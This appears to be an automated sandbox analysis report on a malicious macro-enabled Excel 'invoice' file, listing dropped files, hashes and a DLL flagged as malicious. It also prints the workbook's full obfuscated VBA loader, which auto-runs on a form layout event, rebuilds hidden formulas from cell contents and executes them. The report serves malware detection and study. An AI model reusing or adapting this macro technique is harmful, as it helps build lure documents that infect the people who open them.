C:\Users\user\AppData\Local\Temp\Tar6C4C.tmp Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\WER540A.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	3110
Entropy (8bit):	3.684747436008537
Encrypted:	false
SSDEEP:	96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3JX3:Wl7LBNuhhgG45nv5J
MD5:	544F11F1848CAA1BDF520C7BF1537FD7
SHA1:	644C10A1C87B99C77E7A9863547517AE90FDB128
SHA-256:	CF5212AF389E57239B30155E147E7B660C2E2856576B97D51575D4BF5B1F27AF
SHA-512:	1A34F36C8F8FA96C09CE01ECD2164ADF6B75CFC4B077409D4DC41CA68C6560A243C9DA29DBA2415C4491F7FFDB3A3784325F1E580E9DF018897A0BBCC251C52A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.

C:\Users\user\AppData\Local\Temp\aymakjne.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	318976
Entropy (8bit):	7.120180422335748
Encrypted:	false
SSDEEP:	6144:/HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:vdO02Srnh0qEJC+Y218jdU
MD5:	8E5596083FD4C3134204E905F7F66325
SHA1:	6902210F93D3A940571CC860C4563CD4BE14EDB9
SHA-256:	8110E38AFD33797465AB43841B1C54ABFF7A25ACC30FA27C2623966750D34737
SHA-512:	E7084948B9F9BCB28F7C85A2812825D8012327BCFB5310F5759AEBD585504624682187F9A6AF86206295BFB4F1A9A178DC9322218B2E0A72E2CB3B8FCFB370E5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar26F8.xar Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	modified
Size (bytes):	53009
Entropy (8bit):	7.830887605520775
Encrypted:	false
SSDEEP:	1536:2LUQ86SWyYyqKS4+/28nv5LkJ49TQRNnr:lQBdYLSTdfKN
MD5:	0F1C74C7084B8DD3BA2524E47E787875
SHA1:	1D2DE4747C353CB75756F9A4A76633FA8EBEDD26
SHA-256:	FB9F25B1D23FFE5D9EC94866A1D3FCA0FF6FC473ACBE6579B256DBAE0B1AA7B7
SHA-512:	BEA53FD5FB1B9FD38468EF7F7C65CFAD24BD9CDC8BE104F11446A6C460C594AB04BD57C0765D29E60E6EE6B9278D882569F88BB60900D12060FE187FAA2C323D
Malicious:	false
Preview:	.V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{QO..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c\|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.\|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+..../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 08:43:48 2021, atime=Tue Jan 12 08:43:48 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.47302362689527
Encrypted:	false
SSDEEP:	12:85QWu1LgXg/XAlCPCHaXgzB8IB/jUNX+WnicvbLKG+bDtZ3YilMMEpxRljKATdJU:85YP/XTwz6IhGYevLSDv3q5rNru/
MD5:	34B42419EC07BB353437B55D51FCDAC0
SHA1:	06611D195641AEAD292D3FE00CF700897807799C
SHA-256:	D8D41B83FD02428C3044319FBF03C5CE71AEC0A17191F2592399AF14BF028AB1
SHA-512:	A228F3C6073C0C7D71C101C38D5A2C5C0E1DD64865607834C5BEA5CE1A5C925EB38EFD99E7526BD3EC48EC3588085F6E40C4E182F27A4FA00B2A2E0BE53F2285
Malicious:	false
Preview:	L..................F...........7G..0..m....0..m.....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....,RyM..Desktop.d......QK.X,RyM..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV2680371456-20210111889374.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Jan 12 08:43:48 2021, atime=Tue Jan 12 08:43:57 2021, length=58650, window=hide
Category:	dropped
Size (bytes):	2218
Entropy (8bit):	4.4914034227972355
Encrypted:	false
SSDEEP:	48:8k/XT3InSiw163F5Qh2k/XT3InSiw163F5Q/:8k/XLInSiB3F5Qh2k/XLInSiB3F5Q/
MD5:	4EA962FE3171FDDE0C6D41EA1211CB3B
SHA1:	0A1DB0B6D7F44C03709960150B1119B1AC233684
SHA-256:	DA295B28EC71F72B4A3D8006C24C460F23A7EA124FE70FFB23D284B0AD090916
SHA-512:	399B3E6EC4421A8905E528E1D16437D504747C2F2BE3507062B03856BEA11CCF60798DEA59C1596A0D2F001B1BEFE65715CEA6E41DCA87332191BE0FB3ECFECD
Malicious:	false
Preview:	L..................F.... ........{..0..m.....Lwr.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....,RqM .INV268~1.XLS..p.......Q.y.Q.y...8.....................I.N.V.2.6.8.0.3.7.1.4.5.6.-.2.0.2.1.0.1.1.1.8.8.9.3.7.4...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\INV2680371456-20210111889374.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.2.6.8.0.3.7.1.4.5.6.-.2.0.2.1.0.1.1.1.8.8.9.3.7.4...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	139
Entropy (8bit):	4.6224865058942335
Encrypted:	false
SSDEEP:	3:oyBVomxWnnDd8ShydJSRpuYVo0Dd8ShydJSRpuYVomxWnnDd8ShydJSRpuYVov:djUnB80OJSPFp80OJSPFUnB80OJSPFy
MD5:	369122AC7CEDA0BC3A63AB9309D3AA13
SHA1:	66056E70235BD61BD6501299F7675A519E45F1B9
SHA-256:	CC1244B23024A8BA38D6A909FB5957FE7351CD4A3A62C57D08663E1A8F5B5C80
SHA-512:	E4C27FB0DC48F55EDE0FAB82B4C1CC9B0591810249253EAD2A96EFBFA9DE1595D9CAAC89F44EB356541DB02B6730096F27007F90799BE7673191E35FF2230C9E
Malicious:	false
Preview:	Desktop.LNK=0..[misc]..INV2680371456-20210111889374.LNK=0..INV2680371456-20210111889374.LNK=0..[misc]..INV2680371456-20210111889374.LNK=0..

C:\Users\user\Desktop\A8FE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	58650
Entropy (8bit):	7.85991707505314
Encrypted:	false
SSDEEP:	1536:hde8RzggbLmCf6646CIKISBHiXL2ICmVsLNFqoc:hN1rmCM2FW2Lpn+tc
MD5:	32AB480ACD87728B7BE8DE4D0B831587
SHA1:	25EE2034D7D69B77EB6C1839AB9FB5EEB3A60730
SHA-256:	3214DFD0A066B348C10D0D5EBA282931CBBA07A5361733EF1E887D1A7E61536E
SHA-512:	B5C3B68F1A2AB4EEB3040FA2ADC8B369A4BAA16DDFBE74F44CA00F37442DE48050DA795B3DE02A1431DAE9AC7F36BDB06C50973046847EC2E13A9D2EB3A73347
Malicious:	false
Preview:	...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......\|_;.....W>~......x..u.n.....+.....(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.\|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$INV2680371456-20210111889374.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.77272893585129
TrID:	Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50% Excel Microsoft Office Open XML Format document (40004/1) 37.92% ZIP compressed archive (8000/1) 7.58%
File name:	INV2680371456-20210111889374.xlsm
File size:	42039
MD5:	9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:	6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:	a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
SHA512:	4c92f1fdbd83eb8e38e93800d2620c328ac59de4d5cdef9e8fbbcfc02fe715f110db49a83880ef0726fb1224d140472abf341b22fa7710710a69f061aa880840
SSDEEP:	768:IHT0FIYwYlKUOaSqlRgzxTLKLls5QlHbdYoVq+:uYwQKUOVqlRgzxTOLpZYAq+
File Content Preview:	PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	2

OLE File "/opt/package/joesandbox/database/analysis/338309/sample/INV2680371456-20210111889374.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T14:32:26Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General
Stream Path:	VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	3215
Data ASCII:	. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Integer:
bycilke()
VB_Name
MiV(sem.value)
homepodd()
homepodd
Error
Integer)
bycilke
Function
ol).Name
"!"):
String
"ab":
Split(govs,
Randomize:
yellowsto(yel
Next:
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
yellowsto(Oa))))
Integer
yellowsto
ol).value
nimo(Int((UBound(nimo)
Replace(Vo,
Chr(sem.Row)
Sheets(ol).Cells(homepodd,
"ab"))
Split(kij(ol),
yellowsto(homepodd))
Rnd))
(Run(""
"moreP_"
Variant)
Attribute
Resume
pagesREviewsd(Optional
ecimovert(nimo
ecimovert
MsgBox

VBA Code

Attribute VB_Name = "Module1"

Function homepodd()
homepodd = 5 - 3
End Function

Function pagesREviewsd(Optional wq As Integer) As Integer
Dim O As Integer: Dim Oa As Integer: ol = 1
Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab":
Dim MiV(44563)
For Each sem In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
MiV(sem.value) = Chr(sem.Row)
Next
For Each nog In MiV
govs = govs + nog
Next
Oa = 9: kij = Split(govs, "!"): Ada = Split(kij(ol), yellowsto(homepodd))
For Each Vo In Ada
Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))
On Error Resume Next:
MsgBox (Run("" & bycilke & "ab"))
Next: Oa = 2:
End Function
Function bycilke()
bycilke = "moreP_"
End Function
Function ecimovert(nimo As Variant) As String
Randomize: df = 2 - 1: ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))
End Function



Function yellowsto(yel As Integer)
yellowsto = "$"
If yel = 2 Then yellowsto = "]"
End Function

VBA File Name: Sheet1.cls, Stream Size: 1639

General
Stream Path:	VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	1639
Data ASCII:	. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
Data Raw:	01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Index
VB_Name
VB_Creatable
Application.OnTime
VB_Exposed
Long)
ResizePagess()
VB_Customizable
"REviewsd"
VB_Control
MultiPage"
VB_TemplateDerived
MSForms,
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
ResizePagess
"pages"

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"
Sub ResizePagess()
Application.OnTime Now, "pages" & "REviewsd"
End Sub
Private Sub view_1_a_Layout(ByVal Index As Long)
a = 488: ResizePagess
End Sub

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General
Stream Path:	VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	999
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	550
Entropy:	5.28107922141
Base64 Encoded:	True
Data ASCII:	I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
Data Raw:	49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d

Stream Path: PROJECTwm, File Type: data, Stream Size: 86

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	86
Entropy:	3.24455457963
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3574
Entropy:	4.45079869926
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2060
Entropy:	3.45011283232
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	187
Entropy:	1.91493173134
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
